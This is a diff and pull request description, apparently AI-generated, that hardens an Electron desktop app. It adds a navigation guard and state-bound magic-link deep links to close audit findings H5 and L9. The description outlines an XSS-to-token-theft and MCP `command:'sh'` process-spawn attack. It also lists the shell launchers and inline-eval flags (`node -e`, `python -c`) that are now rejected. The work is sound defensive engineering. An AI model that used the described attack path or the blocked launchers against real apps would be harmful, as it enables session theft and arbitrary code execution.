+ * - `allow`        — same-origin app navigation; let it proceed.
+ * - `deep-link`    — the app's own custom scheme; let it reach the OS handler.
+ * - `open-external`— off-origin http(s); block in-renderer, open in the browser.
+ * - `block`        — anything else (file://, other schemes, junk); drop it.
+ */
+export type NavigationDecision = 'allow' | 'deep-link' | 'open-external' | 'block';
+
+/**
+ * PURE. Classify a renderer-initiated navigation for the H5 guard. Same-origin
+ * http(s) is allowed; the app's own deep-link scheme is passed to the OS so the
+ * exchange handoff still works (it is independently CSRF-bound — see L9);
+ * off-origin http(s) is opened in the system browser; everything else is
+ * blocked. Callers must handle an unparseable app origin (fail closed) before
+ * calling — with a bad origin, same-origin can never match, so an off-origin
+ * value here would still be classified, not silently allowed.
+ */
+export function classifyNavigation(
+  targetUrl: string,
+  appOrigin: string,
+  deepLinkScheme: string = APP_DEEP_LINK_SCHEME,
+): NavigationDecision {
+  if (isAllowedNavigation(targetUrl, appOrigin)) return 'allow';
+
+  let protocol: string | null = null;
+  try {
+    protocol = new URL(targetUrl).protocol;
+  } catch {
+    protocol = null;
+  }
+  if (protocol === deepLinkScheme) return 'deep-link';
+  if (protocol === 'http:' || protocol === 'https:') return 'open-external';
+  return 'block';
+}

--- a/apps/web/src/hooks/__tests__/useDesktopExchangeHandler.test.ts
+++ b/apps/web/src/hooks/__tests__/useDesktopExchangeHandler.test.ts
@@ -17,6 +17,18 @@ describe('buildDesktopExchangeDeepLink', () => {
     expect(url).toContain('code=abc123');
     expect(url).toContain('provider=magic-link');
   });
+
+  it('omits state when none is provided (web / older desktop builds)', () => {
+    expect(buildDesktopExchangeDeepLink('abc123')).not.toContain('state=');
+    expect(buildDesktopExchangeDeepLink('abc123', null)).not.toContain('state=');
+    expect(buildDesktopExchangeDeepLink('abc123', '')).not.toContain('state=');
+  });
+
+  it('forwards the desktop-instance state for exact-match binding (L9)', () => {
+    const url = buildDesktopExchangeDeepLink('abc123', 'deadbeef');
+    expect(url).toContain('state=deadbeef');
+    expect(url).toContain('code=abc123');
+  });
 });
 
 describe('extractDesktopExchangeCode', () => {

--- a/apps/web/src/hooks/useDesktopExchangeHandler.ts
+++ b/apps/web/src/hooks/useDesktopExchangeHandler.ts
@@ -40,7 +40,18 @@ export function useDesktopExchangeHandler() {
     newUrl.search = params.toString();
     window.history.replaceState({}, '', newUrl.toString());
 
-    // Trigger deep link
-    window.location.href = buildDesktopExchangeDeepLink(code);
+    // Bind the exchange to a flow this desktop instance starts (finding L9) so
+    // the main process accepts the returning deep link. The deep link is only
+    // fired after the flow is registered; on web (or older desktop builds) the
+    // begin call is a no-op and we fall through to firing the deep link.
+    const fire = () => {
+      window.location.href = buildDesktopExchangeDeepLink(code);
+    };
+    const beginExchange = window.electron?.auth?.beginExchange;
+    if (beginExchange) {
+      void beginExchange().finally(fire);
+    } else {
+      fire();
+    }
   }, []);
 }

--- a/apps/web/src/hooks/useDesktopExchangeHandler.ts
+++ b/apps/web/src/hooks/useDesktopExchangeHandler.ts
@@ -3,10 +3,14 @@
 import { useEffect } from 'react';
 import { isDesktopPlatform } from '@/lib/desktop-auth';
 
-export function buildDesktopExchangeDeepLink(exchangeCode: string): string {
+export function buildDesktopExchangeDeepLink(exchangeCode: string, state?: string | null): string {
   const deepLinkUrl = new URL('pagespace://auth-exchange');
   deepLinkUrl.searchParams.set('code', exchangeCode);
   deepLinkUrl.searchParams.set('provider', 'magic-link');
+  // Bind the exchange to the desktop instance's auth flow (finding L9): the
+  // main process requires this state to match the one it generated, which
+  // closes the session-fixation window for the magic-link producer.
+  if (state) deepLinkUrl.searchParams.set('state', state);
   return deepLinkUrl.toString();
 }
 
@@ -40,16 +44,21 @@ export function useDesktopExchangeHandler() {
     newUrl.search = params.toString();
     window.history.replaceState({}, '', newUrl.toString());
 
-    // Bind the exchange to a flow this desktop instance starts (finding L9) so
-    // the main process accepts the returning deep link. The deep link is only
-    // fired after the flow is registered; on web (or older desktop builds) the
-    // begin call is a no-op and we fall through to firing the deep link.
-    const fire = () => {
-      window.location.href = buildDesktopExchangeDeepLink(code);
+    // Bind the exchange to a flow this desktop instance starts (finding L9): the
+    // returned state is forwarded in the deep link so the main process can
+    // require an exact match (closing the session-fixation window for this
+    // producer). On web (or older desktop builds) beginExchange is absent and
+    // we fire without a state — the main process then falls back to its
+    // in-progress-flow gate.
+    const fire = (state?: string | null) => {
+      window.location.href = buildDesktopExchangeDeepLink(code, state);
     };
     const beginExchange = window.electron?.auth?.beginExchange;
     if (beginExchange) {
-      void beginExchange().finally(fire);
+      beginExchange().then(
+        (state) => fire(state),
+        () => fire(),
+      );
     } else {
       fire();
     }

--- a/apps/web/src/hooks/useDesktopExchangeHandler.ts
+++ b/apps/web/src/hooks/useDesktopExchangeHandler.ts
@@ -55,7 +55,7 @@ export function useDesktopExchangeHandler() {
     };
     const beginExchange = window.electron?.auth?.beginExchange;
     if (beginExchange) {
-      beginExchange().then(
+      void beginExchange().then(
         (state) => fire(state),
         () => fire(),
       );

--- a/apps/web/src/types/electron.d.ts
+++ b/apps/web/src/types/electron.d.ts
@@ -30,6 +30,14 @@ export interface ElectronAPI {
       deviceToken?: string | null;
     } | null>;
     /**
+     * Begins a desktop-initiated auth flow, recording a single-use state so the
+     * returning `pagespace://auth-exchange` deep link is bound to a login this
+     * instance actually started (CSRF / session-fixation protection). Call this
+     * immediately before triggering any desktop sign-in handoff.
+     * @returns The opaque state value, or null if not on desktop / untrusted.
+     */
+    beginExchange?: () => Promise<string | null>;
+    /**
      * Persists the current authentication session in the native secure storage.
      */
     storeSession: (session: {


### PR DESCRIPTION
Closes audit findings **H5** and **L9** from the 2026-06-09 security audit (WO-03). Desktop renderer hardening, strict-TDD with pure decision functions and a thin main-process shell.

## H5 — Renderer off-origin navigation + unvalidated `set-app-url` + raw token / MCP exec exposed via preload

**Attack closed:** any XSS in the web app running in the desktop renderer could navigate the privileged renderer off-origin, steal the raw session token, spawn arbitrary host processes via MCP config (`command:'sh'`), and persist by repointing `appUrl` at an attacker origin across restarts.

- **Navigation guard** (`window.ts`): `will-navigate` **and** `will-redirect` handlers hard-block any navigation outside the configured app origin; off-origin http(s) links open in the system browser. Fails closed if the app origin is unresolvable. `setWindowOpenHandler` tightened to never spawn a privileged window.
- **`set-app-url` validation** (`ipc-handlers.ts`): allowlist-validated against known PageSpace origins (+ the env-configured origin); anything else rejected and not persisted.
- **Bridge restricted to trusted origin** (`ipc-handlers.ts`): every capability-bearing IPC origin-gates the sender frame and **fails closed** — `auth:get-session-token`, `auth:get-session`, `auth:store-session`, `auth:clear-auth`, `auth:begin-exchange`, `mcp:update-config`/`start`/`restart`/`execute-tool`, `set-app-url` (read **and** write sides of the auth bridge).
- **MCP command hardening** (`mcp-validation.ts`): launchers restricted to a basename allowlist of known runtimes (`node`/`npx`/`bun`/`bunx`/`deno`/`python`/`uv`…); control characters rejected; **inline-code-eval flags rejected** (`node -e`, `python -c`, `bun`/`deno` eval — runtime-aware, so `node -c` syntax-check and normal script/package/module launches still pass). Wired into the existing zod schema, so `mcp:update-config` rejects `command:'sh'`. The spawn path uses no shell, so the basename allowlist (not a metacharacter filter) is the real control — avoiding false-positives on paths like `C:\Program Files (x86)\nodejs\node.exe`. Pointing an allowed runtime at a package/script is the MCP feature itself (RCE-capable by design); that capability is gated by the trusted-origin check on `mcp:update-config` + explicit user action.

## L9 — `pagespace://auth-exchange` accepts codes with no instance binding

**Attack closed:** the original hole accepted an exchange **at any time** with no instance binding (login-CSRF / session fixation into an attacker's account).

- New `auth-exchange-state` module binds the exchange to a login **this instance started**. A deep link is rejected unless a desktop-initiated auth flow is in progress — begun via `auth:open-external` (OAuth/passkey) or the new `auth:begin-exchange` IPC. When a `state` is present it must match exactly; the flow is **single-use** (replay rejected); a wrong-state deep link is rejected **without** consuming the in-progress flow (no DoS of a legit login).
- **Magic-link producer is now strongly bound end-to-end:** `buildDesktopExchangeDeepLink` forwards the desktop-instance state and the main process requires an exact match.
- **Net effect:** attack surface reduced from "anytime/unsolicited" to "only during a user-initiated login window," with magic-link fully exact-match.

## Pure functions (exhaustively unit-tested)
- `isAllowedNavigation(targetUrl, appOrigin)`
- `isAllowedAppUrl(url, allowlist)`
- `isTrustedSenderUrl(senderUrl, appOrigin)`
- `validateMcpServerConfig(cfg) -> {ok, reason}`
- `verifyAuthExchangeState(received, expected)` (constant-time)
- `evaluateAuthExchangeBinding(received, expected)`

## Verification
- `apps/desktop`: `bun run typecheck` ✅ · `bun run lint` ✅ · full vitest **186/186** ✅
- `apps/web`: `typecheck` ✅ · `lint` ✅ · `useDesktopExchangeHandler` test **7/7** ✅
- Base branch (`master`) advanced but with **zero overlap** with touched files — no merge conflict.

## Follow-up (cross-WO, non-blocking)
Strong per-exchange `state` matching for the **OAuth (Google/Apple)** and **passkey** producers requires extending the shared `@pagespace/lib` `oauthStateDataSchema` + OAuth callbacks (owned by the parallel **M5** WO) and plumbing state through the external-browser passkey ceremony. Until then those paths use the in-progress-flow gate, which already closes the documented drive-by attack. Completing that echo lets the no-state acceptance branch be removed entirely.

🤖 Generated with [Claude Code](https://claude.com/claude-code)